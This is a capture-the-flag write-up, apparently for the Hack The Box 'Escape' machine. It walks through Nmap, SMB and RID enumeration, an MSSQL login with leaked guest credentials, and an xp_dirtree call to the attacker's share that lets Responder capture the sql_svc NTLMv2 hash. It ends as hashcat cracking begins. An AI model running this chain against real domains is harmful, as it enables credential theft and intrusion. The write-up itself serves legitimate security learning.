Nmap Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
| Nmap scan report for 10.10.11.202
Host is up, received echo-reply ttl 127 (0.087s latency).
Scanned at 2025-06-09 07:56:39 CDT for 112s
Not shown: 987 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-06-09 12:35:38Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T12:37:08+00:00; -21m21s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAv
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-09T12:37:07+00:00; -21m22s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTA7
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.10.11.202:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-06-09T12:34:38
| Not valid after: 2055-06-09T12:34:38
| MD5: 671f:5a47:d9ec:ad69:13bf:474f:9bd4:9730
| SHA-1: 85c3:1a8d:4520:1702:89af:738d:69ad:a1a4:88d8:da6c
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQRLlXC2E6CaVE2s/thpjvyzANBgkqhkiG9w0BAQsFADA7
| MTkwNwYDVQQDHjAAUwBTAEwAXwBTAGUAbABmAF8AUwBpAGcAbgBlAGQAXwBGAGEA
| bABsAGIAYQBjAGswIBcNMjUwNjA5MTIzNDM4WhgPMjA1NTA2MDkxMjM0MzhaMDsx
| OTA3BgNVBAMeMABTAFMATABfAFMAZQBsAGYAXwBTAGkAZwBuAGUAZABfAEYAYQBs
| AGwAYgBhAGMAazCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBALnWntNq
| HY/AGNeDe62Dx9c4ufle1sjOdkoaUJghyVrxcjLMa18wHXS0SbMpxXG7IVTtqgUL
| xgvtgqjxA4li9e9j/RRULQ9fvrlfJefGxVanot2lrrYb1ytS5dG00oNLJ1D7tfbh
| vE6VbW3SE4XU1q8OWvgFRRo9+dzBagHKM7UPBdiRsiLXIUSCo+MbVgw2EXcqJGs3
| GD9uW9uuG9pWhBBDJQcuztrERRYd0xnheR+CG27DOy67harLjUkz1q3fOve2x9k/
| HRrkZHg+cswRsOcczZTMQpwtK5Fj+P2s6DZtCtTFXZtFfxuEslEBxOyKx5xWeZ5D
| RcZooTrWx1Cj4ZUCAwEAATANBgkqhkiG9w0BAQsFAAOCAQEAhv9l7MCUw0qBZ0Vh
| JUwld6PvWrYwAB6Ikpilo2J9+LRDTAXo0HUzFHkSagY72cCTI24jTIvMwsWZARGN
| 8A5aWYO2e5QoPkUeE3BHFSrEnMJ9cQj8amwkwQVJTkSxCsHO+SDS2jimngqPYeNj
| BVQfzUa2iqRirpxrJ92QnW9w+yCcM1ZugWTPFGpzmQDZtn57xqKPB7M8gL74Exle
| AabW9gYyJkigulGL7VLneT234XgYGv62enhC/OfB+20AIdXJZMYXc5NENPmr/bTN
| EKDML6PTJkPLlFRo/+22jV/qTRTOaUURDjuAw7O3GuLJv25FQHNJoRrK27oylwep
| 4V9BlQ==
|_-----END CERTIFICATE-----
|_ssl-date: 2025-06-09T12:37:08+00:00; -21m21s from scanner time.
| ms-sql-ntlm-info:
| 10.10.11.202:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T21:05:34
| Not valid after: 2023-11-18T21:05:34
| MD5: 96b3:fe55:906c:1d2c:97a1:f4f0:26b1:10b6
| SHA-1: b395:4d2d:39dc:ef1a:673d:6aeb:9de9:1168:91ce:57b2
| -----BEGIN CERTIFICATE-----
| MIIFjzCCBHegAwIBAgITHgAAAAOxjNe2IgNQeAAAAAAAAzANBgkqhkiG9w0BAQsF
| ADBEMRMwEQYKCZImiZPyLGQBGRYDaHRiMRYwFAYKCZImiZPyLGQBGRYGc2VxdWVs
| MRUwEwYDVQQDEwxzZXF1ZWwtREMtQ0EwHhcNMjIxMTE4MjEwNTM0WhcNMjMxMTE4
| MjEwNTM0WjAAMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAr31Axr2W
| 3+qC7+uxVxKHqovlVAzMBXAlhjqcAJRLzAkYTGtiasep1Upfu1EVNKxeN3OfAJAB
| W8F/ROQeDHuGQ5KpB1eZwQZBxD3Qz+GZWLIwJla8+2xwM6d3KA4BfVCr/UuI/IPT
| /DD2jncU0UencJIVVnSA7yHr43oO6Fk2sBuzBRF+G+wRMC/7jUWGbchR635szwS+
| TKL6wW2c1OAJ4IJ76XoizXXpyvV3KdiCA6/AO4e7hbkPt6Qm1y/RJf7xIM8QI67F
| IX9nup8TQFqzWUhVyx0RLfbhZIU1lNumaGuu+VY6tFzcuyfq1wGYlOat3g+Cqv0o
| jfmQwMFidtlxiQIDAQABo4ICvDCCArgwOAYJKwYBBAGCNxUHBCswKQYhKwYBBAGC
| NxUIh6vzdoXcplaH/ZU1g7/DWYOJyjWBdwEhAgFuAgEAMDIGA1UdJQQrMCkGCCsG
| AQUFBwMCBggrBgEFBQcDAQYKKwYBBAGCNxQCAgYHKwYBBQIDBTAOBgNVHQ8BAf8E
| BAMCBaAwQAYJKwYBBAGCNxUKBDMwMTAKBggrBgEFBQcDAjAKBggrBgEFBQcDATAM
| BgorBgEEAYI3FAICMAkGBysGAQUCAwUwHQYDVR0OBBYEFAlW4GaeJTphsLNc+2z9
| yJ304h4jMB8GA1UdIwQYMBaAFGKfMqOg8Dgg1GDAzW3F+lEwXsMVMIHEBgNVHR8E
| gbwwgbkwgbaggbOggbCGga1sZGFwOi8vL0NOPXNlcXVlbC1EQy1DQSxDTj1kYyxD
| Tj1DRFAsQ049UHVibGljJTIwS2V5JTIwU2VydmljZXMsQ049U2VydmljZXMsQ049
| Q29uZmlndXJhdGlvbixEQz1zZXF1ZWwsREM9aHRiP2NlcnRpZmljYXRlUmV2b2Nh
| dGlvbkxpc3Q/YmFzZT9vYmplY3RDbGFzcz1jUkxEaXN0cmlidXRpb25Qb2ludDCB
| vQYIKwYBBQUHAQEEgbAwga0wgaoGCCsGAQUFBzAChoGdbGRhcDovLy9DTj1zZXF1
| ZWwtREMtQ0EsQ049QUlBLENOPVB1YmxpYyUyMEtleSUyMFNlcnZpY2VzLENOPVNl
| cnZpY2VzLENOPUNvbmZpZ3VyYXRpb24sREM9c2VxdWVsLERDPWh0Yj9jQUNlcnRp
| ZmljYXRlP2Jhc2U/b2JqZWN0Q2xhc3M9Y2VydGlmaWNhdGlvbkF1dGhvcml0eTAv
| BgNVHREBAf8EJTAjgg1kYy5zZXF1ZWwuaHRiggpzZXF1ZWwuaHRiggZzZXF1ZWww
| DQYJKoZIhvcNAQELBQADggEBACcxCUjb75dE5ZRgOixbU2IwZdlXfbT9Ua5yTqTv
| NV/btl0SuC/hEhpUwRIitlSH7/DlahtefpK70aYgQLiYU3S/B/TPaGbPSviKJSFQ
| VtD+siKNSCa11DqvZKre89DGNHL8FQ7TgNeCkARo7+m3HJwwjtGNzZGin4hIr4Te
| bqSitRCdD8Aspe14/2qyH4mm3g0ffo4YIzsQlhqhN2A4OzqcL0LVJvEyIcZ2CPIW
| 1qocviqXtrlObCL+r7hTQIqhcuVt6/vOZ4LrbdDHayo80JbGpydCeUZ0KdwJuIdc
| IlLNZVlA1Dr8c7wAsbwaBZhYMDE1DOmC2aCmY5tnfkr2w1Y=
|_-----END CERTIFICATE-----
|
| Checking for Conficker.C or higher...
| Check 1 (port 63970/tcp): CLEAN (Timeout)
| Check 2 (port 35661/tcp): CLEAN (Timeout)
| Check 3 (port 50586/udp): CLEAN (Timeout)
| Check 4 (port 52925/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2025-06-09T12:36:24
|_ start_date: N/A
|_clock-skew: mean: -21m22s, deviation: 2s, median: -21m22s
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 9 07:58:31 2025 -- 1 IP address (1 host up) scanned in 112.59 seconds
|
SMB Enumeration
Null User Login
1
2
3
4
5
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u '' -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\:
SMB 10.10.11.202 445 DC [-] Error enumerating shares: STATUS_ACCESS_DENIED
|
Does Not Exist User Login
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'DoesNotExist' -p '' --shares
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\DoesNotExist:
SMB 10.10.11.202 445 DC [+] Enumerated shares
SMB 10.10.11.202 445 DC Share Permissions Remark
SMB 10.10.11.202 445 DC ----- ----------- ------
SMB 10.10.11.202 445 DC ADMIN$ Remote Admin
SMB 10.10.11.202 445 DC C$ Default share
SMB 10.10.11.202 445 DC IPC$ READ Remote IPC
SMB 10.10.11.202 445 DC NETLOGON Logon server share
SMB 10.10.11.202 445 DC Public READ
SMB 10.10.11.202 445 DC SYSVOL Logon server share
|
Public Shares Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ smbclient "//10.10.11.202/Public" -U 'sequel.htb\DoesNotExist'
Password for [SEQUEL.HTB\DoesNotExist]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Nov 19 05:51:25 2022
.. D 0 Sat Nov 19 05:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 07:39:43 2022
5184255 blocks of size 4096. 1455544 blocks available
smb: \> prompt off
smb: \> mget *
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (110.7 KiloBytes/sec) (average 110.7 KiloBytes/sec)
smb: \> exit
|
PDF Enumeration
We found several usernames:
We got credentials for the MySQL server.
RID Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
|
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec smb 10.10.11.202 -u 'DoesNotExist' -p '' --rid-brute
SMB 10.10.11.202 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.202 445 DC [+] sequel.htb\DoesNotExist:
SMB 10.10.11.202 445 DC [+] Brute forcing RIDs
SMB 10.10.11.202 445 DC 498: sequel\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 500: sequel\Administrator (SidTypeUser)
SMB 10.10.11.202 445 DC 501: sequel\Guest (SidTypeUser)
SMB 10.10.11.202 445 DC 502: sequel\krbtgt (SidTypeUser)
SMB 10.10.11.202 445 DC 512: sequel\Domain Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 513: sequel\Domain Users (SidTypeGroup)
SMB 10.10.11.202 445 DC 514: sequel\Domain Guests (SidTypeGroup)
SMB 10.10.11.202 445 DC 515: sequel\Domain Computers (SidTypeGroup)
SMB 10.10.11.202 445 DC 516: sequel\Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 517: sequel\Cert Publishers (SidTypeAlias)
SMB 10.10.11.202 445 DC 518: sequel\Schema Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 519: sequel\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 520: sequel\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.202 445 DC 521: sequel\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 522: sequel\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.202 445 DC 525: sequel\Protected Users (SidTypeGroup)
SMB 10.10.11.202 445 DC 526: sequel\Key Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 527: sequel\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.202 445 DC 553: sequel\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.202 445 DC 571: sequel\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.202 445 DC 572: sequel\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.202 445 DC 1000: sequel\DC$ (SidTypeUser)
SMB 10.10.11.202 445 DC 1101: sequel\DnsAdmins (SidTypeAlias)
SMB 10.10.11.202 445 DC 1102: sequel\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.202 445 DC 1103: sequel\Tom.Henn (SidTypeUser)
SMB 10.10.11.202 445 DC 1104: sequel\Brandon.Brown (SidTypeUser)
SMB 10.10.11.202 445 DC 1105: sequel\Ryan.Cooper (SidTypeUser)
SMB 10.10.11.202 445 DC 1106: sequel\sql_svc (SidTypeUser)
SMB 10.10.11.202 445 DC 1107: sequel\James.Roberts (SidTypeUser)
SMB 10.10.11.202 445 DC 1108: sequel\Nicole.Thompson (SidTypeUser)
SMB 10.10.11.202 445 DC 1109: sequel\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
|
MSSQL Enumeration
1
2
3
4
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec mssql 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1' --local-auth
MSSQL 10.10.11.202 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:DC)
MSSQL 10.10.11.202 1433 DC [+] PublicUser:GuestUserCantWrite1
|
1
2
3
4
5
6
7
8
9
10
11
12
13
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ impacket-mssqlclient 'PublicUser:GuestUserCantWrite1@10.10.11.202'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)>
|
WINRM Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
|
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1'
SMB 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
HTTP 10.10.11.202 5985 DC [*] http://10.10.11.202:5985/wsman
WINRM 10.10.11.202 5985 DC [-] sequel.htb\PublicUser:GuestUserCantWrite1
┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ crackmapexec winrm 10.10.11.202 -u 'PublicUser' -p 'GuestUserCantWrite1' --local-auth
SMB 10.10.11.202 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:DC)
HTTP 10.10.11.202 5985 DC [*] http://10.10.11.202:5985/wsman
WINRM 10.10.11.202 5985 DC [-] DC\PublicUser:GuestUserCantWrite1
|
Responder Attack
Since we are able to log in to the MSSQL database but can’t use xp_cmdshell, we could try a Responder attack to get the sql_svc password.
1
2
3
| SQL (PublicUser guest@master)> EXEC xp_dirtree '\\10.10.16.8\share'
subdirectory depth
------------ -----
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
| ──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ sudo responder -I tun0
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project:
Github -> https://github.com/sponsors/lgandx
Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [OFF]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [OFF]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.8]
Responder IPv6 [dead:beef:4::1006]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables:
Responder Machine Name [WIN-BTFEDX7IDC4]
Responder Domain Name [1R92.LOCAL]
Responder DCE-RPC Port [45323]
[+] Listening for events...
[SMB] NTLMv2-SSP Client : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:556a5a7d477831c5:33B75B11E4F760CEEB28F23B2CF29A81:010100000000000000F059621AD9DB0198F3616672CAEBDB0000000002000800310052003900320001001E00570049004E002D004200540046004500440058003700490044004300340004003400570049004E002D00420054004600450044005800370049004400430034002E0031005200390032002E004C004F00430041004C000300140031005200390032002E004C004F00430041004C000500140031005200390032002E004C004F00430041004C000700080000F059621AD9DB0106000400020000000800300030000000000000000000000000300000182B65B5A88747C57166D8036E24AFD50499F40FEC449E70B88A984A4F67D7980A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0038000000000000000000
|
Hashcat
1
2
3
4
| ┌──(wzwr㉿kali)-[~/Documents/htb/escape]
└─$ sudo hashcat -m 5600 sql_svc.hash /usr/share/wordlists/rockyou.txt --force
